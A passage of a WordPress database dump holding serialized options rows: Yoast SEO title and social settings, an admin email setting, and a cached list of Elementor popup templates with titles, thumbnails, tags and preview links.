ame\";s:0:\"\";s:17:\"org-founding-date\";s:0:\"\";s:20:\"org-number-employees\";s:0:\"\";s:10:\"org-vat-id\";s:0:\"\";s:10:\"org-tax-id\";s:0:\"\";s:7:\"org-iso\";s:0:\"\";s:8:\"org-duns\";s:0:\"\";s:11:\"org-leicode\";s:0:\"\";s:9:\"org-naics\";s:0:\"\";s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:21:\"schema-page-type-post\";s:7:\"WebPage\";s:24:\"schema-article-type-post\";s:7:\"Article\";s:17:\"social-title-post\";s:9:\"%%title%%\";s:23:\"social-description-post\";s:0:\"\";s:21:\"social-image-url-post\";s:0:\"\";s:20:\"social-image-id-post\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:21:\"schema-page-type-page\";s:7:\"WebPage\";s:24:\"schema-article-type-page\";s:4:\"None\";s:17:\"social-title-page\";s:9:\"%%title%%\";s:23:\"social-description-page\";s:0:\"\";s:21:\"social-image-url-page\";s:0:\"\";s:20:\"social-image-id-page\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:27:\"schema-page-type-attachment\";s:7:\"WebPage\";s:30:\"schema-article-type-attachment\";s:4:\"None\";s:23:\"title-elementor_library\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-elementor_library\";s:0:\"\";s:25:\"noindex-elementor_library\";b:0;s:36:\"display-metabox-pt-elementor_library\";b:1;s:36:\"post_types-elementor_library-maintax\";i:0;s:34:\"schema-page-type-elementor_library\";s:7:\"WebPage\";s:37:\"schema-article-type-elementor_library\";s:4:\"None\";s:30:\"social-title-elementor_library\";s:9:\"%%title%%\";s:36:\"social-description-elementor_library\";s:0:\"\";s:34:\"social-image-url-elementor_library\";s:0:\"\";s:33:\"social-image-id-elementor_library\";i:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:25:\"social-title-tax-category\";s:23:\"%%term_title%% Archives\";s:31:\"social-description-tax-category\";s:0:\"\";s:29:\"social-image-url-tax-category\";s:0:\"\";s:28:\"social-image-id-tax-category\";i:0;s:26:\"taxonomy-category-ptparent\";i:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:25:\"social-title-tax-post_tag\";s:23:\"%%term_title%% Archives\";s:31:\"social-description-tax-post_tag\";s:0:\"\";s:29:\"social-image-url-tax-post_tag\";s:0:\"\";s:28:\"social-image-id-tax-post_tag\";i:0;s:26:\"taxonomy-post_tag-ptparent\";i:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:28:\"social-title-tax-post_format\";s:23:\"%%term_title%% Archives\";s:34:\"social-description-tax-post_format\";s:0:\"\";s:32:\"social-image-url-tax-post_format\";s:0:\"\";s:31:\"social-image-id-tax-post_format\";i:0;s:29:\"taxonomy-post_format-ptparent\";i:0;s:14:\"person_logo_id\";i:0;s:15:\"company_logo_id\";i:0;s:17:\"company_logo_meta\";b:0;s:16:\"person_logo_meta\";b:0;s:29:\"open_graph_frontpage_image_id\";i:0;}','auto'),(1202,'wpseo_social','a:20:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";s:17:\"other_social_urls\";a:0:{}s:12:\"mastodon_url\";s:0:\"\";}','auto'),(1203,'wpseo_llmstxt','a:7:{s:23:\"llms_txt_selection_mode\";s:4:\"auto\";s:13:\"about_us_page\";i:0;s:12:\"contact_page\";i:0;s:10:\"terms_page\";i:0;s:19:\"privacy_policy_page\";i:0;s:9:\"shop_page\";i:0;s:20:\"other_included_pages\";a:0:{}}','auto'),(1235,'WPLANG','','auto'),(1236,'new_admin_email','admin@megabet333.biz','auto'),(1244,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:4:{s:5:\"block\";a:2:{s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:4:\"sets\";a:5:{i:0;s:11:\"Boxing Club\";i:1;s:19:\"Business Consultant\";i:2;s:16:\"Marketing Agency\";i:3;s:9:\"Wireframe\";i:4;s:15:\"Workshop Center\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}s:2:\"lb\";a:1:{s:10:\"categories\";a:2:{i:0;s:4:\"post\";i:1;s:7:\"product\";}}}s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:9:\"templates\";a:823:{i:0;a:21:{s:4:\"tmpl\";i:1280;s:2:\"id\";i:22403;s:5:\"title\";s:40:\"Hello Bar | Subscribe | Aesthetic Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/aesthetic-clinic-19.jpg\";s:12:\"tmpl_created\";i:1647354307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/hello-bar-subscribe-aesthetic-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:48:\"[\"Barbershop\",\"Business\",\"Discount\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:1;a:21:{s:4:\"tmpl\";i:1281;s:2:\"id\";i:22410;s:5:\"title\";s:32:\"Fly-In | Discount | Hair Stylist\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/hair-stylist-20.jpg\";s:12:\"tmpl_created\";i:1647354614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-discount-hair-stylist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Barbershop\",\"Discount\",\"Hair\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:2;a:21:{s:4:\"tmpl\";i:1285;s:2:\"id\";i:22440;s:5:\"title\";s:32:\"Classic | Subscribe | Shoe Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/shoes-store-21.jpg\";s:12:\"tmpl_created\";i:1647418620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-subscribe-shoe-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:37:\"[\"Ecommerce\",\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:3;a:21:{s:4:\"tmpl\";i:1286;s:2:\"id\";i:22446;s:5:\"title\";s:37:\"Full Screen | Subscribe | Denim Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/denim-store-22.jpg\";s:12:\"tmpl_created\";i:1647419614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/full-screen-subscribe-denim-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:4;a:21:{s:4:\"tmpl\";i:1287;s:2:\"id\";i:22452;s:5:\"title\";s:37:\"Fly-In | Subscribe | Pizza Restaurant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/pizza-restaurant-23.jpg\";s:12:\"tmpl_created\";i:1647420733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-subscribe-pizza-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:19:\"[\"Business\",\"Food\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:5;a:21:{s:4:\"tmpl\";i:1288;s:2:\"id\";i:22458;s:5:\"title\";s:38:\"Full Screen | Subscribe | Fashion Shop\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-shop-24.jpg\";s:12:\"tmpl_created\";i:1647426379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-subscribe-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Ecommerce\",\"Fashion\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:6;a:21:{s:4:\"tmpl\";i:1289;s:2:\"id\";i:22464;s:5:\"title\";s:32:\"Fly-In | Contact | Makeup Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/makeup-studio-25.jpg\";s:12:\"tmpl_created\";i:1647427026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-makeup-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:7;a:21:{s:4:\"tmpl\";i:1290;s:2:\"id\";i:22470;s:5:\"title\";s:32:\"Fly-In | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-26.jpg\";s:12:\"tmpl_created\";i:1647428250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:8;a:21:{s:4:\"tmpl\";i:1291;s:2:\"id\";i:22480;s:5:\"title\";s:27:\"Classic | CTA | MasterClass\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/master-class-27.jpg\";s:12:\"tmpl_created\";i:1647428474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-masterclass/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"cta\",\"Magazine\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:9;a:21:{s:4:\"tmpl\";i:1292;s:2:\"id\";i:22489;s:5:\"title\";s:29:\"Classic | CTA | Music Concert\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/music-concert-29.jpg\";s:12:\"tmpl_created\";i:1647429738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-music-concert/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"cta\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:10;a:21:{s:4:\"tmpl\";i:1293;s:2:\"id\";i:22495;s:5:\"title\";s:27:\"Classic | CTA | Music Album\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/music-album-30.jpg\";s:12:\"tmpl_created\";i:1647430056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-music-album/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Ba\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:11;a:21:{s:4:\"tmpl\";i:1294;s:2:\"id\";i:22501;s:5:\"title\";s:37:\"Fly-In | CTA | Photography Exhibition\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/photography-exhibition-31.jpg\";s:12:\"tmpl_created\";i:1647430512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-photography-exhibition/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:12;a:21:{s:4:\"tmpl\";i:1295;s:2:\"id\";i:22507;s:5:\"title\";s:34:\"Classic | CTA | Clothing Shop Sale\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/clothing-shop-sale-32.jpg\";s:12:\"tmpl_created\";i:1647430774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-cta-clothing-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:13;a:21:{s:4:\"tmpl\";i:1296;s:2:\"id\";i:22486;s:5:\"title\";s:30:\"Classic | CTA | Shop Promotion\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/shop-promotion-28.jpg\";s:12:\"tmpl_created\";i:1647430951;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-shop-promotion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"cta\",\"Magazine\",\"Photography\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:14;a:21:{s:4:\"tmpl\";i:1297;s:2:\"id\";i:22516;s:5:\"title\";s:32:\"Fly-In | CTA | Glasses Shop Sale\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/glasses-shop-sale-33.jpg\";s:12:\"tmpl_created\";i:1647431136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-cta-glasses-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:30:\"[\"Business\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:15;a:21:{s:4:\"tmpl\";i:1298;s:2:\"id\";i:22522;s:5:\"title\";s:30:\"Fly-In | Discount | Skate Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/50-skate-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647434058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-skate-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:16;a:21:{s:4:\"tmpl\";i:1299;s:2:\"id\";i:22532;s:5:\"title\";s:43:\"Classic | Subscription | Basketball Academy\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/21-basketball-academy-Subscription.jpg\";s:12:\"tmpl_created\";i:1647434608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/classic-subscription-basketball-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Education\",\"Marketing\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:17;a:21:{s:4:\"tmpl\";i:1300;s:2:\"id\";i:22543;s:5:\"title\";s:38:\"Classic | Discount | Veterinary Clinic\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/veterinery-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647435581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-discount-veterinary-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Discount\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:18;a:21:{s:4:\"tmpl\";i:1301;s:2:\"id\";i:22553;s:5:\"title\";s:39:\"Classic | Contact | Business 